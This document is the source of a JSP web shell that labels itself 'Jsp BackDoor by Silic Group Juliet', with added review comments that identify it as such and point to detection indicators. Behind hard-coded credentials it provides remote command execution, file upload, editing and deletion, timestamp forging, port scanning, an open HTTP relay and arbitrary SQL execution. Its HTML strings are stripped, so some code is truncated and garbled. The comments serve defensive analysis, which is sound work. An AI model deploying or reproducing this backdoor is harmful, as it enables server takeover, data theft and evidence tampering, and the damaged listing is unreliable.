<%@page import="java.util.*,java.io.*,java.sql.*,java.util.zip.*,java.lang.reflect.*,java.net.*,javax.servlet.jsp.*"%> <%@page pageEncoding="gbk"%> <%! /*
 * REVIEW NOTE (defensive analysis): this page is a JSP web shell, not an
 * administration tool. Its own login banner reads: Jsp BackDoor by Silic Group Juliet.
 * The declarations below give an HTTP client these operations inside the servlet
 * container: browse, read, write, delete, rename, copy and zip files, change file
 * timestamps, upload, run a command line, reflect over a class, scan TCP ports,
 * run an HTTP relay on a listening socket, and open arbitrary JDBC connections.
 * Every path, command, address and SQL string comes from request parameters and is
 * used without validation.
 * NOTE(review): the HTML that the out.print()/out.println() literals carried appears
 * to have been stripped from this copy, so several literals and loop headers are
 * truncated and the listing does not compile as shown.
 * Fields: APP_NAME is the page title, portListen and openHttpProxy hold the relay
 * settings; they are instance fields of the generated servlet class, so presumably
 * shared by all requests to this page (confirm against the container).
 */ final String APP_NAME="Manage System - JSP"; int portListen=5000; boolean openHttpProxy=false; void mainForm(String web_Site,JspWriter out)throws Exception{ out.print(""); out.print(""); out.print("
"); out.print(""); out.print(""); out.print("
FilePath:"); out.print(""); out.print(""); out.print(""); out.print("GOtoLink"); out.print("
"); out.print(""); out.print(""); out.print("
"); } void mainMenu(JspWriter out,String web_Site)throws Exception{ out.println(""); out.println(""); out.println(""); out.println(""); out.println(""); out.println(""); out.println(""); out.println(""); out.println("
"+ico(58)+"FileOperation(File.class)
"+ico(48)+"WEB Folder
"+ico(53)+"SystemInfo(System.class)
"+ico(53)+"ServletInfo
"+ico(53)+"SystemTools
"+ico(57)+"Interfaces
About Silic Group
"); } void showFiles(JspWriter out,String path)throws Exception{ File file=new File(path); long maxSize=0; if(file.isDirectory()&&file.exists()){ File[] f=file.listFiles(); out.println(""); for(int i=0;i"); else out.println(""); } out.println("
nametypesizemodify datereadonlycan writehiddenAction
"+ico(48)+f[i].getName()+" DIR "+getSize(f[i].length())+""+new java.util.Date(f[i].lastModified())+""+f[i].canRead()+""+f[i].canWrite()+""+f[i].isHidden()+""+fOperation(true,f[i].getAbsolutePath())+"
"+ico(50)+f[i].getName()+" file "+getSize(f[i].length())+""+new java.util.Date(f[i].lastModified())+""+f[i].canRead()+""+f[i].canWrite()+""+f[i].isHidden()+""+fOperation(false,f[i].getAbsolutePath())+"
"); out.print("this folder size:"+getSize(maxSize)); } } void showSystemInfo(JspWriter out)throws Exception{ Map map=null; Set set=null; Iterator it=null; map=System.getProperties(); set=map.keySet(); it=set.iterator(); out.println("
System Property info:
System CPU :"); out.print(Runtime.getRuntime().availableProcessors()+"
"); out.print("the JVM Free Memory :"+getSize(Runtime.getRuntime().freeMemory())); out.print("
the JVM Max Memory :"+getSize(Runtime.getRuntime().maxMemory())); } void servletInfo(ServletConfig config,JspWriter out)throws Exception{ ServletContext sc=config.getServletContext(); out.println("Server info: "+sc.getServerInfo()+"
"); out.println("ServletContext name: "+sc.getServletContextName()+"
"); out.println("Major version :"+sc.getMajorVersion()+"
"); out.println("Minor version :"+sc.getMinorVersion()+"
"); Enumeration en=sc.getInitParameterNames(); String initInfo="init parameter:
"; out.print(initInfo); while(en.hasMoreElements()){ String name=(String)en.nextElement(); initInfo="key:"+name+" value:"+sc.getInitParameter(name) +"
"; out.print(initInfo); } } void downFile(String filename,HttpServletResponse res)throws Exception{ int w=0; byte[] buffer=new byte[256]; byte[] b=(new File(filename)).getName().getBytes(); String outFile=new String(b,"ISO-8859-1"); res.reset(); res.setHeader("Content-disposition","attachment;filename=\""+outFile+"\""); ServletOutputStream sos=res.getOutputStream(); BufferedInputStream bis=null; try{ bis=new BufferedInputStream(new FileInputStream(filename)); while((w=bis.read(buffer,0,buffer.length))!=-1){ sos.write(buffer,0,w); } }catch(Exception e){ }finally{ if(bis!=null)bis.close(); } sos.flush(); res.flushBuffer(); } void deleteFile(String filename,JspWriter out)throws Exception{ File f=new File(filename); if(f.exists()){ if(f.delete())out.print(filename+"delete success..."); }else{ out.print("file not find!!"); } } void renameFile(String filename,JspWriter out)throws Exception{ int split=filename.indexOf("|"); String newFilename=filename.substring(split+1); filename=filename.substring(0,split); File f=new File(filename); if(f.exists()){ if(f.renameTo(new File(newFilename)))out.print(newFilename+" file move success"); }else{ out.print("file not find!"); } } void copyFile(String filename,JspWriter out)throws Exception{ int split=filename.indexOf("|"); String newFilename=filename.substring(split+1); filename=filename.substring(0,split); File f=new File(filename); BufferedInputStream bis=null; BufferedOutputStream bos=null; if(f.exists()){ try{ bis=new BufferedInputStream(new FileInputStream(filename)); bos=new BufferedOutputStream(new FileOutputStream(newFilename)); int s=0; while((s=bis.read())!=-1){ bos.write(s); } }catch(Exception e){ out.print("file copy failed"); }finally{ if(bis!=null)bis.close(); if(bos!=null)bos.close(); } out.print(newFilename+"file copy success"); }else{ out.print("file not find!"); } } void editFile(String filename,JspWriter out)throws IOException{ File f=new File(filename); out.print("
File Path:"); out.print(""); out.print(""); out.print(""); out.print("
"); } void saveFile(String filename,byte[] fileContent,JspWriter out)throws IOException{ if(filename!=null||fileContent!=null){ BufferedOutputStream bos=null; try{ bos=new BufferedOutputStream(new FileOutputStream(filename)); bos.write(fileContent,0,fileContent.length); }finally{ if(bos!=null)bos.close(); } out.print(filename+"file save success"); }else{ out.print("Error"); } }
/* dateChange: sets the last-modified time of the named file from the year, month and day request parameters (Calendar months are zero-based; the time of day stays at the current clock time). On a host where this page has run, file modification times cannot be relied on as evidence. */
void dateChange(String filename,String year,String month,String day,JspWriter out)throws IOException{ File f=new File(filename); if(f.exists()){ Calendar calendar=Calendar.getInstance(); calendar.set(Integer.parseInt(year),Integer.parseInt(month),Integer.parseInt(day)); if(f.setLastModified(calendar.getTimeInMillis())) out.print(filename+"file date change success"); else out.print(filename+"file date change error"); }else{ out.println("file not find!!!"); } }
/* execFile: hands the request-supplied string straight to Runtime.exec and reads the process output decoded as GB2312 (the code that wrote it to the response is truncated in this copy). The child process is created by the JVM of the servlet container, so process-creation telemetry with the application server as parent is where its use shows up. */
void execFile(String file,JspWriter out)throws Exception{ int i=0; Runtime rt=Runtime.getRuntime(); Process ps=rt.exec(file); InputStreamReader isr = null; char[] bufferC=new char[1024]; try{ isr=new InputStreamReader(ps.getInputStream(),"GB2312"); out.print(""); systemTools(out); } void zip(String zipPath, String srcPath,JspWriter out) throws Exception { FileOutputStream output = null; ZipOutputStream zipOutput = null; try{ output = new FileOutputStream(zipPath); zipOutput = new ZipOutputStream(output); zipEntry(zipOutput,srcPath,srcPath,zipPath); }catch(Exception e){ out.print("file zip error"); }finally{ if(zipOutput!=null)zipOutput.close(); } out.print("zip ok"+zipPath); } void zipEntry(ZipOutputStream zipOs, String initPath,String filePath,String zipPath) throws Exception { String entryName = filePath; File f = new File(filePath); if (f.isDirectory()){ String[] files = f.list(); for(int i = 0; i < files.length; i++) zipEntry(zipOs, initPath, filePath + File.separator + files[i],zipPath); return; } String chPh = initPath.substring(initPath.lastIndexOf("/") + 1); int idx=initPath.lastIndexOf(chPh); if (idx != -1) { entryName = 
filePath.substring(idx); } ZipEntry entry; entry = new ZipEntry(entryName); File ff = new File(filePath); if(ff.getAbsolutePath().equals(zipPath))return; entry.setSize(ff.length()); entry.setTime(ff.lastModified()); entry.setCrc(0); CRC32 crc = new CRC32(); crc.reset(); zipOs.putNextEntry(entry); int len = 0; byte[] buffer = new byte[2048]; int bufferLen = 2048; FileInputStream input =null; try{ input = new FileInputStream(filePath); while ((len = input.read(buffer, 0, bufferLen)) != -1) { zipOs.write(buffer, 0, len); crc.update(buffer, 0, len); } }catch(Exception e){ }finally{ if(input!=null)input.close(); } entry.setCrc(crc.getValue()); }
/* upfile: writes the multipart request body to the path given by the caller (the UPaddress parameter in the dispatcher). The boundary is taken at a fixed offset of 30 into the Content-Type header and five readLine calls are issued before the output file is opened; nothing restricts the destination path. readLine, defined next, also prints every line it reads to System.out, so uploaded content can leave traces in the stdout log of the container. */
void upfile(HttpServletRequest request,JspWriter out,String filename)throws Exception{ String boundary = request.getContentType().substring(30); ServletInputStream sis=request.getInputStream(); BufferedOutputStream bos=null; byte[] buffer = new byte[1024]; int line=-1; for(int i=0;i<5;i++){ line=readLine(buffer,sis,boundary); } try{ bos=new BufferedOutputStream(new FileOutputStream(filename)); while(line!=-1){ bos.write(buffer,0,line); line=readLine(buffer,sis,boundary); } out.print("upload success"); }catch(Exception e){ out.print("upload failed!"); }finally{ if(bos!=null)bos.close(); } } int readLine(byte[] lineByte,ServletInputStream servletInputstream,String endStr){ try{ int len=0; len=servletInputstream.readLine(lineByte,0,lineByte.length); String str=new String(lineByte,0,len); System.out.println(str); if(str.indexOf(endStr)==-1) return len; else return -1; }catch(Exception _ex){ return -1; } } void newFolder(JspWriter out,String foldername)throws Exception{ File f=new File(foldername); if(f.mkdirs()){ out.print("create folder success"); }else{ out.print("create folder failed!"); } } void reflectAPI(JspWriter out,String className)throws Exception{ Class cls=Class.forName(className); String constructor=""; String ifString=""; Class[] interfaces=cls.getInterfaces(); String supperClass=cls.getSuperclass().toString(); 
Constructor[] c=cls.getDeclaredConstructors(); Field[] f=cls.getDeclaredFields(); Method[] m=cls.getDeclaredMethods(); for(int i=0;i"+Modifier.toString(cls.getModifiers())+" "+cls+"
extends "+supperClass+"
implemets
"+ifString); out.print("
{
Constructor:
"); for(int i=0;i"); out.print("Field:
"); for(int i=0;i"); out.print("Function:
"); for(int i=0;i"); out.print("
}"); }
/* scanPort: resolves the requested address and starts one ScanPort thread per slice of 15 ports; each thread attempts a plain TCP connect to every port in its slice and prints the ones that accept. Connect failures are swallowed. On the network this appears as a burst of outbound connection attempts originating from the application server. (The range check at the top is truncated in this copy.) */
void scanPort(JspWriter out,String strAddress,int startPort,int endPort)throws Exception{ if(endPort65535||endPort>65535||endPort<=0){ out.print("port setup error"); return; } InetAddress ia=InetAddress.getByName(strAddress); for(int p=startPort;p<=endPort;p+=15){ (new ScanPort(ia,p,p+14,out)).start(); } Thread.sleep((int)(endPort/startPort)*5000); } class ScanPort extends Thread{ int startPort; int endPort; InetAddress address; javax.servlet.jsp.JspWriter out; public ScanPort(InetAddress address,int startPort,int endPort,JspWriter out){ this.address=address; this.startPort=startPort; this.endPort=endPort; this.out=out; } public void run(){ Socket s=null; for(int port=startPort;port<=endPort;port++){ try{ s=new Socket(address,port); out.println("port "+port+" is Open
"); } catch(IOException e){ }finally{ try{s.close();}catch(Exception e){} } } } }
/* switchProxyService, RunProxyService, HttpProxy: each call flips openHttpProxy and, when it becomes true, starts a listener thread. The listener binds TCP 5000 directly (the port constructor argument is stored but never used), performs no authentication of its own, and relays each accepted connection to the host named in the Host header of the first read, on the port given there or 80. The accept loop rechecks openHttpProxy only after accept() returns, so the socket can stay open after the page reports the proxy as closed. An unexpected listener on that port owned by the container process is a host-level indicator. */
public void switchProxyService(JspWriter out)throws Exception{ if(openHttpProxy=!openHttpProxy){ new RunProxyService(portListen).start(); out.print("Proxy running"); }else{ out.print("Proxy closed"); } } public class RunProxyService extends Thread{ int port; public RunProxyService(int port){ this.port=port; } public void run(){ try { ServerSocket ss=new ServerSocket(5000); while(true){ if(openHttpProxy){ new HttpProxy(ss.accept()).start(); }else{ break; } } ss.close(); } catch (IOException e) { } } } public class HttpProxy extends Thread{ private Socket s; public int timeOut=10000; public HttpProxy(Socket s){ this.s=s; } public HttpProxy(Socket s,int timeOut){ this.s=s; this.timeOut=timeOut; } public void run(){ byte[] bit=new byte[1024]; int readBit=0; int size=0; String returnAddress=null; int returnPort = 0; String sendHostName=null; int sendPort=0; Socket sendSocket=null; OutputStream os=null; InputStream is=null; try{ int split=0; is=s.getInputStream(); if((size=is.read(bit, 0, bit.length))==-1)return; String httpHead=new String(bit,0,size); split=httpHead.indexOf("\nHost: ")+7; sendHostName=httpHead.substring(split, httpHead.indexOf("\n", split)); if((split=sendHostName.indexOf(':'))!=-1){ sendPort=Integer.parseInt(sendHostName.substring(split+1).trim()); sendHostName=sendHostName.substring(0,split); sendSocket=new Socket(sendHostName.trim(),sendPort); }else{ sendSocket=new Socket(sendHostName.trim(),80); } sendSocket.setSoTimeout(timeOut); os=sendSocket.getOutputStream(); os.write(httpHead.getBytes()); if(size==bit.length) while((size=is.read(bit, 0, bit.length))!=-1){ os.write(bit,0 , size); } os.flush(); is=sendSocket.getInputStream(); os=s.getOutputStream(); while((size=is.read(bit, 0, bit.length))!=-1){ os.write(bit,0 , size); os.flush(); } }catch(SocketException se){ } catch (IOException ie) { } catch (Exception e) { }finally{ if(is!=null){ try { is.close(); } catch 
(IOException e) { } } if(os!=null){ try { os.close(); } catch (IOException e) { } } } } }
/* ConnectionDBM and DBM: loads the JDBC driver class named by the caller, connects with the URL, user and password supplied by the caller, and then either dumps database metadata (action LDB) or runs the supplied SQL text verbatim (executeQuery when it starts with select, executeUpdate otherwise). All of these values come from request parameters in the dispatcher. Database audit logs for connections originating from the application host are the matching evidence source. */
void ConnectionDBM(JspWriter out,String driver,String url,String userName,String passWord,String sqlAction,String sqlCmd)throws Exception{ DBM dbm=new DBM(driver,url,userName,passWord,out); if(sqlAction.equals("LDB")){ dbm.lookInfo(); }else{ dbm.executeSQL(sqlCmd); } dbm.closeAll(); } class DBM{ private JspWriter out; private Connection con; private Statement stmt; private ResultSet rs; public DBM(String driverName,String url,String userName,String passWord,JspWriter out)throws Exception{ Class.forName(driverName); this.out=out; con=DriverManager.getConnection(url,userName,passWord); } public void lookInfo()throws Exception{ DatabaseMetaData dbmd=con.getMetaData(); String tableType=null; out.print("DataBaseInfo"); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print("
DataBaseName:"+dbmd.getDatabaseProductName()+"
DataBaseVersion:"+dbmd.getDatabaseProductVersion()+"
the Numeric Function:"+dbmd.getNumericFunctions()+"
the String Function:"+dbmd.getStringFunctions()+"
the TimeDate Function:"+dbmd.getTimeDateFunctions()+"
the System Function:"+dbmd.getSystemFunctions()+"
"); out.print("ProcedureInfo"); try{ getProcedureDetail(dbmd.getProcedures(null,null,null)); }catch(Exception proE){} try{ rs=dbmd.getTables(null,null,null,null); }catch(Exception tabE){} out.print("DataBase Tables Info
"); while(rs.next()){ tableType=rs.getString(4); out.print("TableName:"+rs.getString(3)+" Type:"+tableType+"
"); if(tableType.indexOf("VIEW")>=0||tableType.indexOf("TABLE")>=0){ try{ getTableDetail(dbmd.getColumns(null,null,rs.getString(3),null)); }catch(Exception columnE){} } } this.closeAll(); } private void getTableDetail(ResultSet tableRs)throws Exception{ out.print("
"); while(tableRs.next()){ out.print(""); } out.print("
Column NameData TypeType NameCOLUMN_SIZEIS_NULLABLECHAR_OCTET_LENGTH
"+tableRs.getString(4)+""+tableRs.getInt(5)+""+tableRs.getString(6)+""+tableRs.getInt(7)+""+tableRs.getString(18)+""+tableRs.getInt(16)+"
"); tableRs.close(); } private void getProcedureDetail(ResultSet procRs)throws Exception{ out.print(""); while(procRs.next()){ out.print(""); } out.print("
PROCEDURE_NAMEREMARKSPROCEDURE_TYPE
"+procRs.getString(3)+""+procRs.getString(7)+""+procRs.getShort(8)+"
"); procRs.close(); } public void executeSQL(String sqlCmd)throws Exception{ stmt=con.createStatement(); if(sqlCmd.trim().toLowerCase().startsWith("select")){ rs=stmt.executeQuery(sqlCmd); ResultSetMetaData rsmd=rs.getMetaData(); int ColumnCount=rsmd.getColumnCount(); out.print(""); for(int i=1;i<=ColumnCount;i++){ out.print(""); } out.print(""); while(rs.next()){ out.print(""); for(int i=1;i<=ColumnCount;i++){ out.print(""); } out.print(""); } }else{ stmt.executeUpdate(sqlCmd); out.print("execute success"); } } public void closeAll()throws SQLException{ try{ if(rs!=null)rs.close(); }catch(Exception e){ } try{ if(stmt!=null)stmt.close(); }catch(Exception e){ } try{ if(con!=null)con.close(); }catch(Exception e){ } } } void systemTools(JspWriter out)throws Exception{ out.print("
"+rsmd.getColumnName(i)+"
"+rs.getString(i)+"
"); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); if(!openHttpProxy){ out.print(""); }else{ out.print(""); } out.print("
System class runfilepath:
file uploadfile:upload file
new filefile name:
Create folderfolder name:
Reflect APIClass Name:
Scan PortIP:Start Port:End Port:
DBM"); out.print(""); out.print("Driver:URL:user:password:SqlCmd:
OpenTheHttpProxy
CloseTheHttpProxy
"); } void userInterFaces(JspWriter out)throws Exception{ out.print("Recode by Silic Group Inc."); } String encodeChange(String str)throws Exception{ if(str==null) return null; else return new String(str.getBytes("ISO-8859-1"),"gb2312"); } String folderReplace(String folder){ return folder.replace('\\','/'); } String fOperation(boolean f,String file){ if(f) return "Delete Rename setDate Zip"; else return "Delete Rename setDate Copy Edit Down"; } String getSize(long size){ if(size>=1024*1024*1024){ return new Long(size/1073741824L)+"G"; }else if(size>=1024*1024){ return new Long(size/1048576L)+"M"; }else if(size>=1024){ return new Long(size/1024)+"K"; }else return size+"B"; } String ico(int num){ return "&#"+num+""; } String htmlEntity(String htmlCode){ StringBuffer sb=new StringBuffer(); char c=0; for(int i=0;i')sb.append(">"); else if(c==' ')sb.append(" "); else sb.append(c); } return sb.toString(); } %> <%
/* Access gate: a session without the ID attribute must send the request parameters Silic and juliet equal to the two literals below; on a match the session attribute ID is set to 1 and the client is redirected back to this URI, otherwise the login form is printed and the page returns. The credentials are hard-coded literals, so the gate offers no protection once the contents of this file are known. The two parameter names, the login banner text and APP_NAME are stable strings for file-content and request-log matching. The session idle timeout is raised to 6000 seconds. */
session.setMaxInactiveInterval(6000); final String WEB_SITE=folderReplace(application.getRealPath("/")); final String URL=request.getRequestURI(); if(session.getAttribute("ID")==null){ String username="admin"; String password="silic"; if(request.getParameter("Silic")!=null&&request.getParameter("juliet")!=null&&request.getParameter("Silic").equals(username)&&request.getParameter("juliet").equals(password)){ session.setAttribute("ID","1"); response.sendRedirect(URL); }else{ out.println("


"+"Jsp BackDoor by Silic Group Juliet"+"

" + "
username:
" + "password:
"); } return; } %> <%=APP_NAME%> <%
/* Dispatcher: the first character of the Action request parameter selects the operation; a missing or unmatched value falls through to mainForm. Every other input is read from request parameters, most of them passed through encodeChange (ISO-8859-1 bytes reinterpreted as gb2312), and handed to the helper unchanged. The empty catch swallows every exception, so a failed operation leaves no error text in the response. */
String Action=request.getParameter("Action"); char action=(Action==null?"0":Action).charAt(0); try{ switch(action){ case 'M':mainMenu(out,WEB_SITE);break; case 'F':showFiles(out,encodeChange(request.getParameter("FolderPath")));break; case 'S':showSystemInfo(out);break; case 'L':servletInfo(config,out);break; case 'D':downFile(encodeChange(request.getParameter("Filename")),response);return; case 'E':editFile(encodeChange(request.getParameter("Filename")),out);break; case 'R':deleteFile(encodeChange(request.getParameter("Filename")),out);break; case 'K':saveFile(encodeChange(request.getParameter("filename")),request.getParameter("FileContent").getBytes("ISO-8859-1"),out);break; case 'N':renameFile(encodeChange(request.getParameter("Filename")),out);break; case 'P':copyFile(encodeChange(request.getParameter("Filename")),out);break; case 'd':dateChange(encodeChange(request.getParameter("Filename")),request.getParameter("year"),request.getParameter("month"),request.getParameter("day"),out);break; case 'r':execFile(encodeChange(request.getParameter("execFile")),out);break; case 'Z':zip(encodeChange(request.getParameter("Filename")),encodeChange(request.getParameter("FolderPath")),out);break; case 'U':upfile(request,out,encodeChange(request.getParameter("UPaddress")));break; case 'n':newFolder(out,encodeChange(request.getParameter("Filename")));break; case 'A':reflectAPI(out,encodeChange(request.getParameter("Filename")));break; case 'I':scanPort(out,encodeChange(request.getParameter("IPaddress")),Integer.parseInt(request.getParameter("startPort")),Integer.parseInt(request.getParameter("endPort")));break; case 's':ConnectionDBM(out,encodeChange(request.getParameter("driver")),encodeChange(request.getParameter("conUrl")),encodeChange(request.getParameter("user")),encodeChange(request.getParameter("password")),encodeChange(request.getParameter("run")),encodeChange(request.getParameter("sqlcmd")));break; case 
'H':switchProxyService(out);break; case 'i':userInterFaces(out);break; case 'T':systemTools(out);break; default: mainForm(WEB_SITE,out);break; } }catch(Exception e){ } out.print(""); out.close(); %>